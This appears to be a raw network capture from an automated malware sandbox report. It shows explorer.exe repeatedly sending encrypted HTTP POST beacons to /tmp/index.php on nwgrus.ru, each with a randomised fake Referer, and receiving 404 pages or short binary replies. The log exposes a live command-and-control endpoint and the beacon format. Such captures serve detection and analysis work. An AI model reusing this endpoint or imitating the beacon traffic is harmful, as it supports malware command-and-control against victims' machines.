                                                                                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED]
                                                                                                                            Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                            17192.168.2.449753190.219.117.240802580C:\Windows\explorer.exe
                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                            Oct 3, 2024 02:52:43.567970991 CEST280OUTPOST /tmp/index.php HTTP/1.1
                                                                                                                            Connection: Keep-Alive
                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                            Accept: */*
                                                                                                                            Referer: http://nrxoolvtsikko.net/
                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                            Content-Length: 296
                                                                                                                            Host: nwgrus.ru
                                                                                                                            Oct 3, 2024 02:52:43.568006992 CEST296OUTData Raw: 3b 6e 53 11 f1 bb 6c 27 ae ae c5 76 02 05 78 cc 7b 7d bb ec 6b 00 e5 67 0f 7d 7f 94 44 c3 c0 1a 9a 2d ce 2e 00 18 24 1d 9f 98 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2d 5b 1a 6b 2c 90 f5 76 0b 75 2b 2b a5 f1
                                                                                                                            Data Ascii: ;nSl'vx{}kg}D-.$? 9Yt M@NA -[k,vu++U#Cq26rImjlU0Plq)4P/VYv`O?J(}5s'y^^7T=+l!4vDOUne&"X-
                                                                                                                            Oct 3, 2024 02:52:44.660093069 CEST137INHTTP/1.1 200 OK
                                                                                                                            Server: nginx/1.26.0
                                                                                                                            Date: Thu, 03 Oct 2024 00:52:44 GMT
                                                                                                                            Content-Type: text/html; charset=utf-8
                                                                                                                            Connection: close


                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                            18192.168.2.449754190.219.117.240802580C:\Windows\explorer.exe
                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                            Oct 3, 2024 02:52:44.676074028 CEST282OUTPOST /tmp/index.php HTTP/1.1
                                                                                                                            Connection: Keep-Alive
                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                            Accept: */*
                                                                                                                            Referer: http://sjiiqjlirvpxdxa.org/
                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                            Content-Length: 183
                                                                                                                            Host: nwgrus.ru
                                                                                                                            Oct 3, 2024 02:52:44.676100016 CEST183OUTData Raw: 3b 6e 53 11 f1 bb 6c 27 ae ae c5 76 02 05 78 cc 7b 7d bb ec 6b 00 e5 67 0f 7d 7f 94 44 c3 c0 1a 9a 2d ce 2e 00 18 24 1d 9f 98 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2d 5b 1b 6b 2c 90 f5 76 0b 75 57 33 e5 99
                                                                                                                            Data Ascii: ;nSl'vx{}kg}D-.$? 9Yt M@NA -[k,vuW3L Slu>Zy(4=prU.E$[N@OYIsi#.04_oKPt
                                                                                                                            Oct 3, 2024 02:52:45.770915985 CEST484INHTTP/1.1 404 Not Found
                                                                                                                            Server: nginx/1.26.0
                                                                                                                            Date: Thu, 03 Oct 2024 00:52:45 GMT
                                                                                                                            Content-Type: text/html; charset=utf-8
                                                                                                                            Connection: close
                                                                                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED]
                                                                                                                            Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                            19192.168.2.449755190.219.117.240802580C:\Windows\explorer.exe
                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                            Oct 3, 2024 02:52:45.786030054 CEST278OUTPOST /tmp/index.php HTTP/1.1
                                                                                                                            Connection: Keep-Alive
                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                            Accept: */*
                                                                                                                            Referer: http://vhprqvsefqk.com/
                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                            Content-Length: 314
                                                                                                                            Host: nwgrus.ru
                                                                                                                            Oct 3, 2024 02:52:45.786030054 CEST314OUTData Raw: 3b 6e 53 11 f1 bb 6c 27 ae ae c5 76 02 05 78 cc 7b 7d bb ec 6b 00 e5 67 0f 7d 7f 94 44 c3 c0 1a 9a 2d ce 2e 00 18 24 1d 9f 98 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2d 5b 18 6b 2c 90 f5 76 0b 75 61 34 b7 af
                                                                                                                            Data Ascii: ;nSl'vx{}kg}D-.$? 9Yt M@NA -[k,vua4Jd|YZeV99k<,vwp"^LV<Z@LV@VR4}BWIct07)'Bjy~[B\E|#
                                                                                                                            Oct 3, 2024 02:52:46.899544954 CEST484INHTTP/1.1 404 Not Found
                                                                                                                            Server: nginx/1.26.0
                                                                                                                            Date: Thu, 03 Oct 2024 00:52:46 GMT
                                                                                                                            Content-Type: text/html; charset=utf-8
                                                                                                                            Connection: close
                                                                                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED]
                                                                                                                            Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                            20192.168.2.449756190.219.117.240802580C:\Windows\explorer.exe
                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                            Oct 3, 2024 02:52:46.922025919 CEST280OUTPOST /tmp/index.php HTTP/1.1
                                                                                                                            Connection: Keep-Alive
                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                            Accept: */*
                                                                                                                            Referer: http://vtfvgsblgpnxu.net/
                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                            Content-Length: 150
                                                                                                                            Host: nwgrus.ru
                                                                                                                            Oct 3, 2024 02:52:46.922041893 CEST150OUTData Raw: 3b 6e 53 11 f1 bb 6c 27 ae ae c5 76 02 05 78 cc 7b 7d bb ec 6b 00 e5 67 0f 7d 7f 94 44 c3 c0 1a 9a 2d ce 2e 00 18 24 1d 9f 98 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2d 5b 19 6b 2c 90 f5 76 0b 75 21 30 e6 be
                                                                                                                            Data Ascii: ;nSl'vx{}kg}D-.$? 9Yt M@NA -[k,vu!0loDxQZONTBmx[R2Z%FdEv
                                                                                                                            Oct 3, 2024 02:52:48.006617069 CEST137INHTTP/1.1 200 OK
                                                                                                                            Server: nginx/1.26.0
                                                                                                                            Date: Thu, 03 Oct 2024 00:52:47 GMT
                                                                                                                            Content-Type: text/html; charset=utf-8
                                                                                                                            Connection: close


                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                            21192.168.2.449757190.219.117.240802580C:\Windows\explorer.exe
                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                            Oct 3, 2024 02:52:48.021768093 CEST278OUTPOST /tmp/index.php HTTP/1.1
                                                                                                                            Connection: Keep-Alive
                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                            Accept: */*
                                                                                                                            Referer: http://uxyakrfxevg.net/
                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                            Content-Length: 340
                                                                                                                            Host: nwgrus.ru
                                                                                                                            Oct 3, 2024 02:52:48.021769047 CEST340OUTData Raw: 3b 6e 53 11 f1 bb 6c 27 ae ae c5 76 02 05 78 cc 7b 7d bb ec 6b 00 e5 67 0f 7d 7f 94 44 c3 c0 1a 9a 2d ce 2e 00 18 24 1d 9f 98 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2d 5b 1e 6b 2c 90 f5 76 0b 75 42 54 d3 e7
                                                                                                                            Data Ascii: ;nSl'vx{}kg}D-.$? 9Yt M@NA -[k,vuBTN;nTPc6Q7d`jLfJH'*_{}ZVUZ\+_.;Sblsw==?J/HOsZ8C9"]F&
                                                                                                                            Oct 3, 2024 02:52:49.125507116 CEST484INHTTP/1.1 404 Not Found
                                                                                                                            Server: nginx/1.26.0
                                                                                                                            Date: Thu, 03 Oct 2024 00:52:48 GMT
                                                                                                                            Content-Type: text/html; charset=utf-8
                                                                                                                            Connection: close
                                                                                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED]
                                                                                                                            Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                            22192.168.2.449758190.219.117.240802580C:\Windows\explorer.exe
                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                            Oct 3, 2024 02:52:49.139525890 CEST279OUTPOST /tmp/index.php HTTP/1.1
                                                                                                                            Connection: Keep-Alive
                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                            Accept: */*
                                                                                                                            Referer: http://tltlkajmdifu.org/
                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                            Content-Length: 258
                                                                                                                            Host: nwgrus.ru
                                                                                                                            Oct 3, 2024 02:52:49.139568090 CEST258OUTData Raw: 3b 6e 53 11 f1 bb 6c 27 ae ae c5 76 02 05 78 cc 7b 7d bb ec 6b 00 e5 67 0f 7d 7f 94 44 c3 c0 1a 9a 2d ce 2e 00 18 24 1d 9f 98 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2d 5b 1f 6b 2c 90 f5 76 0b 75 54 25 a0 a0
                                                                                                                            Data Ascii: ;nSl'vx{}kg}D-.$? 9Yt M@NA -[k,vuT%0Vb}8kFQpPnY?=~-*95Z<7u-Y+H]}X[7w.lCc@5ZM>7V/\;Ni
                                                                                                                            Oct 3, 2024 02:52:50.225066900 CEST484INHTTP/1.1 404 Not Found
                                                                                                                            Server: nginx/1.26.0
                                                                                                                            Date: Thu, 03 Oct 2024 00:52:50 GMT
                                                                                                                            Content-Type: text/html; charset=utf-8
                                                                                                                            Connection: close
                                                                                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED]
                                                                                                                            Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                            23192.168.2.449759190.219.117.240802580C:\Windows\explorer.exe
                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                            Oct 3, 2024 02:52:50.232947111 CEST280OUTPOST /tmp/index.php HTTP/1.1
                                                                                                                            Connection: Keep-Alive
                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                            Accept: */*
                                                                                                                            Referer: http://nsllnqutblayn.org/
                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                            Content-Length: 112
                                                                                                                            Host: nwgrus.ru
                                                                                                                            Oct 3, 2024 02:52:50.232956886 CEST112OUTData Raw: 3b 6e 53 11 f1 bb 6c 27 ae ae c5 76 02 05 78 cc 7b 7d bb ec 6b 00 e5 67 0f 7d 7f 94 44 c3 c0 1a 9a 2d ce 2e 00 18 24 1d 9f 98 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2d 5b 1c 6b 2c 90 f5 76 0b 75 5e 24 a6 ea
                                                                                                                            Data Ascii: ;nSl'vx{}kg}D-.$? 9Yt M@NA -[k,vu^$s-lP'xI>$X
                                                                                                                            Oct 3, 2024 02:52:51.414446115 CEST484INHTTP/1.1 404 Not Found
                                                                                                                            Server: nginx/1.26.0
                                                                                                                            Date: Thu, 03 Oct 2024 00:52:51 GMT
                                                                                                                            Content-Type: text/html; charset=utf-8
                                                                                                                            Connection: close
                                                                                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED]
                                                                                                                            Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                            24192.168.2.449760190.219.117.240802580C:\Windows\explorer.exe
                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                            Oct 3, 2024 02:52:51.427004099 CEST280OUTPOST /tmp/index.php HTTP/1.1
                                                                                                                            Connection: Keep-Alive
                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                            Accept: */*
                                                                                                                            Referer: http://qqewfcdsrwqbg.org/
                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                            Content-Length: 174
                                                                                                                            Host: nwgrus.ru
                                                                                                                            Oct 3, 2024 02:52:51.427081108 CEST174OUTData Raw: 3b 6e 53 11 f1 bb 6c 27 ae ae c5 76 02 05 78 cc 7b 7d bb ec 6b 00 e5 67 0f 7d 7f 94 44 c3 c0 1a 9a 2d ce 2e 00 18 24 1d 9f 98 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2d 5b 1d 6b 2c 90 f5 76 0b 75 34 43 f0 87
                                                                                                                            Data Ascii: ;nSl'vx{}kg}D-.$? 9Yt M@NA -[k,vu4C)njpmDd+0Nu)r="4Z#0;"JQkN,Qw=:l(hz
                                                                                                                            Oct 3, 2024 02:52:52.738327026 CEST189INHTTP/1.1 404 Not Found
                                                                                                                            Server: nginx/1.26.0
                                                                                                                            Date: Thu, 03 Oct 2024 00:52:52 GMT
                                                                                                                            Content-Type: text/html; charset=utf-8
                                                                                                                            Connection: close
                                                                                                                            Data Raw: 00 00 d8 80 d7 bd 9d d9 a1 98 be 23 cd c5 88 81 99 8b 5c 36 59 39 08 a5 6c 5f b5 ac 17 bd cf b4 fe 6d 9f 3d d4 a1 72 0a 41 c2 8f 97 cb
                                                                                                                            Data Ascii: #\6Y9l_m=rA


                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                            25192.168.2.449763190.219.117.240802580C:\Windows\explorer.exe
                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                            Oct 3, 2024 02:52:53.970432997 CEST279OUTPOST /tmp/index.php HTTP/1.1
                                                                                                                            Connection: Keep-Alive
                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                            Accept: */*
                                                                                                                            Referer: http://pdbldukfsrlj.com/
                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                            Content-Length: 135
                                                                                                                            Host: nwgrus.ru
                                                                                                                            Oct 3, 2024 02:52:53.970432997 CEST135OUTData Raw: 3b 6e 53 11 f1 bb 6c 27 ae ae c5 76 02 05 78 cc 7b 7d bb ec 6b 00 e5 67 0f 7d 7f 94 44 c3 c0 1a 9a 2d ce 2e 00 18 24 1d 9f 98 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2c 5b 1d 6b 2c 90 f4 76 0b 75 4a 1a cc 81
                                                                                                                            Data Ascii: ;nSl'vx{}kg}D-.$? 9Yt M@NA ,[k,vuJPBaOYI.ghM`BsiyXO
                                                                                                                            Oct 3, 2024 02:52:55.080913067 CEST484INHTTP/1.1 404 Not Found
                                                                                                                            Server: nginx/1.26.0
                                                                                                                            Date: Thu, 03 Oct 2024 00:52:54 GMT
                                                                                                                            Content-Type: text/html; charset=utf-8
                                                                                                                            Connection: close
                                                                                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED]
                                                                                                                            Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                            26192.168.2.449764190.219.117.240802580C:\Windows\explorer.exe
                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                            Oct 3, 2024 02:52:55.103493929 CEST281OUTPOST /tmp/index.php HTTP/1.1
                                                                                                                            Connection: Keep-Alive
                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                            Accept: */*
                                                                                                                            Referer: http://rgaydglbcbbvar.com/
                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                            Content-Length: 128
                                                                                                                            Host: nwgrus.ru
